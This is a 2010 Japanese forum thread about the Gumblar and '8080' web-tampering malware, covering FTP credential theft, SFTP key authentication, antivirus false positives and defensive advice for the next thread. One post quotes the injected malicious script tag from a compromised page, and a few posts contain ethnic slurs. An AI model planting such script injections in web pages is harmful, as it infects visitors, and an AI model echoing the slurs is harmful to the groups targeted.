銃は悪くない。使う人が悪い。
ウィルスは悪くない。DL実行する人が悪い。

784 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:32:35
銃は戦争の道具として作られたんだけどな

785 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:35:14
ウイルス作者はなぜ捕まらないのか?(上)
ttp://wiredvision.jp/archives/200201/2002012101.html
ウイルス作者はなぜ捕まらないのか?(下)
ttp://wiredvision.jp/archives/200201/2002012207.html

もうそうなっちゃうと、一般主婦が自発的に検体を送ることがないように
警察当局が作者を自発的に捕まえようなんてないすからね。
ベンダーが自発的に捕まえる権限もないす。
この3者が相互に働きかけがない限り永遠にないすね。

786 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:38:53
>>781
index.htmに/*LGPL*/

787 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:43:34
>>781
<script src="http://省略:8080/G先生/G先生/FeDex/うpろだ/うpろだ/" id="N7vcg6m1vyt" type="text/javascript" defer="defer">
</script>

その先は死亡

788 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:44:04
aguseさんは「Trojan-Downloader.JS.Pegel.b」だと仰ってます。

789 :名無しさん@お腹いっぱい。:2010/02/04(木) 14:47:32
他国に仕掛けるならブロードバンドサプライヤーを立ち上げやすい都合上で中国ロシアが適当。
ちょろっと銀行個人情報抜きニュイルスとか偽コーデックや偽セキュリティソフトをまく程度なら北米・ブラジル。
この傾向で決まりですわ。

790 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:05:52
ちょっと質問いい?
Part2から読んでるんだけど、ちょっと混乱してきた
今回はFFFTPのレジストリのように、設定ファイルからIDとパスが盗まれてるわけで、そこにSFTPとかを利用しても通信が暗号化されるだけでIDとパスを保存したら意味ないんじゃない?
それともパケットが盗まれた時の対策のためにSFTPを利用しろって言ってるの?
対策を聞いてると重要度としては、SFTPにする>IDとパスを保存しない のように見えるんだけどちょっと違う気がするんだよね
まさか>じゃなくて=だとか?

791 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:13:45
>>790
カスペルが自国からまいてるとか思ってるの?
イの一番に疑われるような「ゆとり」じゃねえよ。

792 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:17:07
>>790
感染しないことが一番
全てのプラグイン切っとけ

サイト管理用PCのように分けるのも吉

793 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:17:23
?


794 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:20:08
>>790
FTPS使おうがSFTP使おうが、
PC内にID、パスワードが保存されていれば意味ないね


SFTP使えるなら、まずID、パスワードは使わない
過去使っていたら、それらの痕跡をレジストリなどを含めて削除する
SFTPは公開鍵認証を使い十分長い推測されないパスフレーズを使う

ただし、既に感染している場合、秘密鍵を持って行かれた上で
パスフレーズもキーロガーで持って枯れる可能性があるが

795 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:20:13
>>790
SSH 使ってるから大丈夫。
でも、>>287 になったら大問題。
あとはぐぐってね。

796 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:20:33
感染してから設定ファイル読んでパス盗まれるって話だろ

797 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:22:41
感染感染って感染しなけりゃおkだろ

798 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:26:42
公共機関がwinny使う時の注意とか配布するのを連想させる
使うのをやめろっていう

799 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:32:53
まあ、もしそうなら賞賛目的に他ベンダーが密告するとか
まあ俺ならそうするね。

子供の思惑程度で白黒が決まるならブッシュマン村の村長ぐらいにはなれるでしょうな。

800 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:37:04
?

801 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:38:18
ワードサラダですね、わかります

802 :45:2010/02/04(木) 15:40:09 ?2BP(1236)
>>781
めるぽ

803 :名無しさん@お腹いっぱい。:2010/02/04(木) 15:45:37
       _
┌――─┴┴─――┐
│ セルフサービス .│
└―――┬┬─――┘
        ││   ./
      ゛゛'゛'゛ /
         /
     | \/
     \ \
      \ノ

ガッ はセルフサービスになりました。

使用方法は以下のようになります
     ∧
  ガッ<  >_∧
= ()二)V`Д´)<ぬるぽ
    \ヽ ノ )
    ノ(○´ノ
   (_ノ(__)

尚、使用方法を誤ると、最悪の場合、命を落とす危険性がございますので、
初めてご使用される方は、各都道府県に設置してある専門の窓口にご相談下さい。

財団法人 全日本 ぬるぽガッ セルフ振興会

804 :45:2010/02/04(木) 15:53:56 ?2BP(1236)
>>781
> Delivery Status Notification (Failure)

> Technical details of permanent failure:
> DNS Error: Domain name not found

届かないメアド。。。
かごやにもめるぽ

>>803
予知能力者でぷか。

805 :名無しさん@お腹いっぱい。:2010/02/04(木) 16:23:10
>>781
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD><BODY>

かごやで対処したのかな?

806 :45:2010/02/04(木) 16:45:55 ?2BP(1236)
>>781,>>805
かごやからめる北お。

807 :名無しさん@お腹いっぱい。:2010/02/04(木) 16:52:30
>>806
kwsk

808 :45:2010/02/04(木) 17:01:50 ?2BP(1236)
KR-1はいいバイクだった。


>>807
ユーザーに連絡したとのこと。

809 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:18:54
>>808
対応乙

810 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:39:00
GumblarはAdob? Readerのバグ
わざわざGumblarとかいう略称を付ける必要ない
フルネームで「GumblAdob?Reader」と呼び今後もAdob?を疑うことを忘れるな

811 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:42:42
なにそれこわい

812 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:44:29
Internet Explorer の脆弱性により、情報漏えいが起こる
公開日: 2010年2月4日 | 最終更新日: 2010年2月4日
ttp://www.microsoft.com/japan/technet/security/advisory/980088.mspx

来たよん

813 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:48:56
危ないのはIE6だけじゃなかったのね

814 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:54:02
>>812
このサイト初めて知った

815 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:56:22
>>792
まぁ感染しない事が一番だよね。対策頑張ります
やっぱりJavascriptとかプラグイン自体を切った方が良いんだよね
FirefoxにはNoscript導入してるから大丈夫だけど、Chromeには何も対策してないなー。ちょっくらJavascript切ってみるか

>>794>>795
調べてみたらSFTPって公開鍵認証出来るんだね。なるほど。これなら秘密鍵が流出しなければ大丈夫だね
SFTPとかそういうのって単に通信を暗号化するだけなのかと思ってたw
確かにこれなら8080に対する対策としては有効だ。秘密鍵まで持っていかれたら終わりだけどw

一応調べてから質問したつもりだけど、ワード追加してみたら簡単に情報が出てきた。どうやら自分の調べ方が悪かったようです。お騒がせしてすみません

816 :名無しさん@お腹いっぱい。:2010/02/04(木) 17:59:46
【速報】Vectorが節分に豆まきならぬウイルスばら撒いている模様
ttp://www.yukawanet.com/archives/2272566.html

817 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:02:09
>>812
Opera総合スレでは、これはJPCERT/CC報告のものとは関係ないと主張している人がいる。
実際のところどうなのか詳しく解説できる人はいない?

818 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:02:17
>>816
exeファイルを生成するからウイルスとして誤検出する

819 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:13:29
朝青龍は朝鮮系の血が入ってるから日本人じゃ太刀打ちできない程の強さだったが・・・・
寂しくなるな

820 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:15:09
>>816
誰が、至急この問題に対処すべきかは明らかだ

821 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:16:14
>>818
どうだろう

swf2exe 1.07(Vectorのライブラリからダウンロードできるもの)
ttp://www.virustotal.com/analisis/d45ce29dbc5fadd19a8ee51c85704047d01a42083e0ded0a49c6a19e270b610b-1265274284
swf2exe 1.08(Vector内にある作者個人ページからダウンロードできるもの)
ttp://www.virustotal.com/analisis/a3f6872e66e4416ae80e56e4b17bf4212e2194eb706bdf9bd495916fa4863e15-1265274605

822 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:19:25
誤爆だろ
怪しいトリックを使っている疑惑

823 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:27:05
また火狐がなんかいっちゃってんの

824 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:29:29
>>821
>ウィルス誤認に関しては少し前にupx圧縮を用いてファイル容量を圧縮していた時期に多く報告されていたので止めていました。
>ただ、ソフトウェアの仕様上、exeファイル内部に更にexeファイルの構造があるのでやはりウィルス対策ソフトによっては
>誤認されてしまうことがあるようです。
>ちなみに、私がソフトウェアを公開するときにはavast! anti virus(http://www.avast.com/index_jpn.html)を用いてスキャンをした上で公開しています。

作者が誤検出だと言ってる

825 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:40:22
>>824
なるほど、掲示板で答えてるのか
dクス

826 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:48:38
えっ avast!5でWin32:Malware-genとして検出される藁
その作者はスキャンなんかしてねーダロ

827 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:51:53
えっ

828 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:53:14
誤爆

829 :名無しさん@お腹いっぱい。:2010/02/04(木) 18:53:52
>>826
>[18] Re:swf2exe Name:みどるべあ Date: 2009/11/15(Sun) 16:53
>Date: 2009/11/15(Sun) 16:53

830 :名無しさん@お腹いっぱい。:2010/02/04(木) 19:21:47
Gumblarと何か関係でも?

831 :名無しさん@お腹いっぱい。:2010/02/04(木) 19:32:07
ttp://anubis.iseclab.org/?action=result&task_id=16614f204173bf71409bb63f3cff59177&format=html

832 :名無しさん@お腹いっぱい。:2010/02/04(木) 20:18:30
>【速報】Vectorが節分に豆まきならぬウイルスばら撒いている模様
豆が欲しいって言ったら
鳩ぽっぽじゃん。

833 :名無しさん@お腹いっぱい。:2010/02/04(木) 20:19:57
誤検出かどうかも自分じゃ確認できない低脳が喚いてるだけか

834 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:21:27
Windows98買ってから全然ウイルスにかからないと思っていたらIE4だからだったのか

835 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:30:49
PDF-XChange ViewerやFoxit Readerだと安心?(各ソフトのJavaScript無効で)

836 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:37:16
安心かと聞かなきゃわからないようなレベルの人には
安心ではないと返すしかない

837 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:40:13
PDF-XChange ViewerにもJavaScript機能あったのか

838 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:42:43
>>792
今一番恐れてるのは、Gumblarの類がConfickerみたいな
ネットワークウイルス機能を持つことだ。

そうなると、管理PCを分けてもダメなケースがあり得る。
同一ネットワーク上にある端末が全てやられる。

もちろん、完全にネットワークを分離したり、パッチを当てたり
PFW使ったり脆弱なパスワードを使っていなければ問題ないけど、
万が一1台でも対策が漏れてる端末があればアウト。

839 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:44:51
>>838
少なくともGumblar.xの時点で同一ネットワーク上は拾われてたよ
8080系はわからんけど

840 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:48:50
>>839
それはあくまでFTPのパケット盗聴だろ?
そうじゃなくて、ネットワーク経由で感染を広げる機能のことをいっている。

841 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:50:32
石橋を叩いても渡らない状態か・・・

842 :名無しさん@お腹いっぱい。:2010/02/04(木) 23:59:57
>>840
ごめん><

843 :名無しさん@お腹いっぱい。:2010/02/05(金) 00:00:41
インターネット経由だとルーターでブロックされるからブラウザから侵入するぐらいしか方法がないけど
一度侵入されるとそこはLANの内部
つまり

844 :名無しさん@お腹いっぱい。:2010/02/05(金) 00:04:40
クライアントは変なサービスを公開するなよ
この際SMBもoffでおkだろ・・・

845 :名無しさん@お腹いっぱい。:2010/02/05(金) 02:03:33
ウイルスが感染されていると思われるサイト?につないでしまったのですが、これは絶対に感染してしまっているのでしょうか?

846 :名無しさん@お腹いっぱい。:2010/02/05(金) 02:06:10
どうでしょう?
上半身裸になって口あーんってしてみてもらえますか

847 :名無しさん@お腹いっぱい。:2010/02/05(金) 02:40:11
まずは思いつくだけの確認をすべて行ってみましょう。

848 :名無しさん@お腹いっぱい。:2010/02/05(金) 04:13:59
Acrobat Readerという公害にしとけば確認不要

849 :名無しさん@お腹いっぱい。:2010/02/05(金) 07:39:28
FFFTPは簡単な暗号化でパスワードを保存してたってことは
暗号を解いてからパスワードを送信してるってこと?


850 :名無しさん@お腹いっぱい。:2010/02/05(金) 07:54:37
>>849
そらそうだ。

851 :名無しさん@お腹いっぱい。:2010/02/05(金) 07:59:59
なんだよここ中高女子しかいねーのかよ

852 :名無しさん@お腹いっぱい。:2010/02/05(金) 08:22:21
8080系が絶賛活動中の中、Gumblar.xが再降臨なされた模様…

2010年2月 「Gumblar.x」の改ざん攻撃再開
ttp://blogs.yahoo.co.jp/noooo_spam/59488040.html


デヴィ夫人…(´・ω・`)

853 :名無しさん@お腹いっぱい。:2010/02/05(金) 11:07:34
>>852
今までGumblarや8080でブログの改竄ってあったっけ?
もし、Gumblarならブログにもログインし始めたと思っておk?

この改竄がどのように行われたかが気になる
仮にアカウントが盗まれたなら、少し前にあったアメブロの情報漏えいが絡むのか、それともGumblarによる不正取得なのか
仮ににアカウントが盗まれたとしても、ブラウザからの編集でjavascriptが使えるのか?
有料サービスか、著名人用の場合、カスタムヘッダー作成か何かで使えるのかな

とりあえず、今さっきアカウントとってみたけど、
無料アカウントだとjavascriptは使えないっぽいんだけど

854 :名無しさん@お腹いっぱい。:2010/02/05(金) 11:27:20
>>853
改ざんされてるのはTOPページなだけで、ブログは関係ないぞ
ブログはアメブロだが、TOPページは別の会社のサーバだからw

855 :名無しさん@お腹いっぱい。:2010/02/05(金) 11:31:06
アメブロはサイドバーでJavaScript使えるね

856 :名無しさん@お腹いっぱい。:2010/02/05(金) 11:31:17
>>854
ぶーーー
夫人のオフィシャルサイトだったのねw
サンクスです!

857 :名無しさん@お腹いっぱい。:2010/02/05(金) 11:35:13
ロリポFTPS対応。

858 :名無しさん@お腹いっぱい。:2010/02/05(金) 13:58:56
FTPS対応してもIDパス取られてたら
支那クラッカーがそのIDでFTPSで安全に通信するだけ

859 :名無しさん@お腹いっぱい。:2010/02/05(金) 14:05:16
キーロガー食ってたアウトだけど脳内パス保存が一番いい気がしてきた

860 :名無しさん@お腹いっぱい。:2010/02/05(金) 14:07:03
早い話サイトを更新するたびにOSをクリーンインストールすればおk

861 :名無しさん@お腹いっぱい。:2010/02/05(金) 14:09:07
>>860
1CD linuxでおk

862 :名無しさん@お腹いっぱい。:2010/02/05(金) 14:10:14
ポストイットに ID、Pass 書いてモニタにペタッ!!が最強なのか・・・ orz

863 :名無しさん@お腹いっぱい。:2010/02/05(金) 14:17:50
>>862
個人レベルならそれでいいんだけどな。
企業とかじゃセキュリティポリシー上そういうのはダメ。
ソーシャルハックの対象になりかねず、違う意味で脆弱性になるから。

Gumblerとあんまり関係ない話ですまん。

864 :名無しさん@お腹いっぱい。:2010/02/05(金) 14:42:36
>>863
それくらいわかった上でのネタだと思うぞwww

865 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:06:47
本人にしか分からない方法で書けばOK

866 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:10:07
元のテキスト-UTF8>-xor>-base91>-モールス信号>音声
ハハッ、ここまですれば本人しかわからないww

867 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:12:04
一番多いのがKBの裏w

868 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:50:41
●全世界にウ○ツキ評価を公表している機関の(おまけにそれもトップページ)
会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々

http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal ←スポークスマンぽい!?
ほいじゃあ印をジカリンで(微笑)
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg ←検出技術を開発したりなど技術畑の人(その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?)
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri
*Zulfikar Ramzan →超注目!!★現Architect and Technical Director職★
→顔(ジカリン) ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest ←ググルと(記述: Candid Wueest)といっぱい出てくる人 
→顔(当日の当人) ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
(ネクタイスーツで昼間から飲むお呼ばれの酒はサイコーだぜ)

2009年9月ジュネーブ会議にて

●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM

Martin Overton さん

●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
(アメリカンインターナショナルグループ:アメリカ合衆国ニューヨークに本拠を置く保険会社)
の、おそらく社内セキュリティ担当かなんかの人

Pascal Lointier さん

(Rev.8)ノートン警察()笑 http://www.youtube.com/watch?v=FnEYTf3zyMk

869 :名無しさん@お腹いっぱい。:2010/02/05(金) 15:51:41
>>866
復号できなかったらどうすんだw

870 :名無しさん@お腹いっぱい。:2010/02/05(金) 16:15:57
>>869
誰か作ってw

871 :名無しさん@お腹いっぱい。:2010/02/05(金) 16:19:36
誰かに作ってもらうなんて・・・極秘で自分独自仕様にしないと意味がないんじゃ

872 :名無しさん@お腹いっぱい。:2010/02/05(金) 16:29:47
むしろ、>>866で公表してるからダメw

873 :名無しさん@お腹いっぱい。:2010/02/05(金) 16:59:23
音声はミクで代用できるね


874 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:18:47
>>866
復号の順番を忘れて復号できないに可能性が

875 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:35:29
誰もうpしないのでおいらがアップロードしてみた(´・ω・) ス
ttp://labs-uploader.sabaitiba.com/virus/download/1265358801.mp3
PASS:virus

これなら8080系に感染しても大丈夫!!

876 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:40:35
で、安全はFTPソフトは?

877 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:41:08
日本語おかしいですよ

878 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:42:21
>>875
それをどうしろと…

879 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:48:55
>>878
なんのファイルだったの?

880 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:52:38
ウイルスでした

881 :名無しさん@お腹いっぱい。:2010/02/05(金) 17:54:08
>>879
>>866の無茶なパスワード保存案を具現化した物

882 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:02:04
モールス信号の時点で俺には手の打ちようがなかった

883 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:14:31
virusと思って提出しちまったじゃねーかw

884 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:16:31
送る前に中身確認しろよ…

885 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:17:04
なんという誤爆・・・

886 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:22:57
すっかり馴れ合いスレに成り下がったな

887 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:24:57
=================ここまで馴れ合い=================

888 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:25:05
引っかからないから提出したんだろがボケ!
そもそもPassがvirusなのが悪い

889 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:35:23
ちょっとすいません、18時ちょうどにパソコンから蛍の光が流れだしたのですが
これってなにかのウイルスですか?

890 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:39:55
virusじゃなくてinfectedにしろよw

891 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:56:55
>>889
恐らく蛍がPCの中に入っています
そのPCは諦めて蛍の光観賞用にしましょう

892 :名無しさん@お腹いっぱい。:2010/02/05(金) 18:57:20
エサもちゃんとあげてくださいね

893 :名無しさん@お腹いっぱい。:2010/02/05(金) 19:01:29
エサは金魚のやつでいいですかね

894 :名無しさん@お腹いっぱい。:2010/02/05(金) 19:04:55
蛍の育て方を教えてもらえるスレと聞いて

895 :名無しさん@お腹いっぱい。:2010/02/05(金) 19:07:20
蛍も原子力発電だからウランを食べるよ

896 :名無しさん@お腹いっぱい。:2010/02/05(金) 19:35:38
みなさんとてもセンスがいいですが
ネタじゃなくて本当にあの下校時に流れる蛍の光が流れてきたんです
怖いなと思って検索してみたけどわからなかったので
ここならウイルスの達人がいっぱいいると思って書き込みしてみました

897 :名無しさん@お腹いっぱい。:2010/02/05(金) 19:40:05
こっちでやれ

http://gimpo.2ch.net/test/read.cgi/natsudora/1235231886/

898 :名無しさん@お腹いっぱい。:2010/02/05(金) 20:12:35
●全世界にウ○ツキ評価を公表している機関の(おまけにそれもトップページ)
会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々

http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal ←スポークスマンぽい!?
ほいじゃあ印をジカリンで(微笑)
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg ←検出技術を開発したりなど技術畑の人(その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?)
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri ←只のカバン持ち!?
*Zulfikar Ramzan →超注目!!★現Architect and Technical Director職★
→顔(ジカリン) ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest ←ググルと(記述: Candid Wueest)といっぱい出てくる人 
→顔(当日の当人) ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
(ネクタイスーツで昼間から飲んじゃうお呼ばれの酒はサイコーだぜ)

2009年9月ジュネーブ会議にて

●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM

Martin Overton さん

●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
(アメリカンインターナショナルグループ:アメリカ合衆国ニューヨークに本拠を置く保険会社)
の、おそらく社内セキュリティ担当かなんかの人

Pascal Lointier さん

(Rev.8.1)ノートン警察()笑 http://www.youtube.com/watch?v=FnEYTf3zyMk

899 :名無しさん@お腹いっぱい。:2010/02/05(金) 20:32:01
http://gumblar.s1.dynamitelife.net/gumx/
Gumblar.Xのチェッカーを作ってみた

900 :名無しさん@お腹いっぱい。:2010/02/05(金) 20:59:44
xで足りるの?aからagまであるよ
ttp://www.kaspersky.com/viruswatchlite?search_virus=Gumblar
GPLとLGPLとExceptionでPegel
大方のDEBUG型はbに吸収されたことは確認済み
ttp://www.kaspersky.com/viruswatchlite?search_virus=Pegel

901 :名無しさん@お腹いっぱい。:2010/02/05(金) 21:12:37
>>900
このスレでの分類は
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html#04
を使ってる人が多くて、カスペの命名を厳密に使ってる人は少ないと思う

902 :名無しさん@お腹いっぱい。:2010/02/05(金) 21:18:22
糞チェッカーは糞

903 :名無しさん@お腹いっぱい。:2010/02/05(金) 23:30:49
>>899 乙です。
Dewi Sukarno ― デ○ィ夫人オフィシャルサイト(たぶんGumblar.X)
ttp://www●dewisukarno●co●jp/

ttp://www.virustotal.com/jp/analisis/ac2da817bb79c9ae652878e5345dd327ef6ce3c99f8b962719ee76bd037a8fb9-1265379913
結果: 0/40 (0%)

誰か凸ヨロ・・・

904 :名無しさん@お腹いっぱい。:2010/02/05(金) 23:50:53
いや…そのファイルスキャンしても意味ないだろ。
scriptタグ1行しか書いてないんだし。

905 :名無しさん@お腹いっぱい。:2010/02/06(土) 00:26:08
Gumblar(.x)が復活したから
Gumblarと8080系を明確に区別しないといかんね。

↓次スレのテンプラに入れてくれ↓

【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x (祝・復活)
2009/10〜12に出現。
挿入するコードが Gumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われている。
※今後の動向には注意が必要。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG、.ru:X)
Gumblar.x が消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険。


906 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:04:45
>>905
自分が立てるなら >>2 あたりの最初のほうに入れるつもりだが
どうなるか分からんので次スレ立てる人には
>>5>>10 の感染確認の修正↓または廃止と
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

>>9 は少々危険なので廃止の方向でお願いしたい

あと、ここが実質4スレ目だから次スレは5でいいよな?

907 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:08:06
>>906
それなら今、テンプレ修正した方がよいと思いますが

908 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:10:09
>>7のタイトルもGENOではミスリードに繋がるので変えて欲しい

909 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:10:13
>>906
自分も今テンプレ案練っといた方が良いと思う

910 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:13:46
まず>>1
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】実質4スレ目
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

911 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:14:08
GENOは商標だし
ファイルが有るかだけで判断すると無ければ安全と思うだろう

912 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:34:46
↓のサイトがAvastで反応するんだが…?

ネット銀行比較.com
ttp://www●jygboc●com/

913 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:37:12
【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】
http://pc11.2ch.net/test/read.cgi/sec/1265387369/

914 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:41:42
勝手に立てたやつがいるな
今回はテンプレ練ってから新しく立てようぜ

915 :906:2010/02/06(土) 01:46:59
よかったらテンプレ案を貼るが
どうする?

916 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:47:31
>>2
の変更は?どうする

917 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:47:58
>>915
宜しくですー。

918 :名無しさん@お腹いっぱい。:2010/02/06(土) 01:49:39
>>912
ソース見たけど感染してるっぽいね

919 :906:2010/02/06(土) 01:51:46
>>917
じゃ、9レス分になるが今から貼る
おかしなところがあったら修正よろ

920 :906:2010/02/06(土) 01:52:57
【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現在、メディアでガンブラー(の亜種)と紹介されている8080系が流行しています
最近のウイルスは短期間で亜種が発生するので
ウイルス対策ソフトだけに依存するのは危険です
対策として使用しているソフトウェアのセキュリティ・アップデートが有効です
基本的なことですが効果的な対策ですのでアップデートは欠かさず行いましょう
(テンプレの【脆弱性を利用されやすいソフトウェア】参照)

★★★ 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ★★★
★★★ 危険なサイトが貼られる場合がありますのでURLは安易にクリックしないでください ★★★
★★★ 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ★★★

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】(実質4)
http://pc11.2ch.net/test/read.cgi/sec/1263865118/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/

921 :906:2010/02/06(土) 01:54:01
【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x
2009/10〜12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。

8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)

922 :906:2010/02/06(土) 01:54:42
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
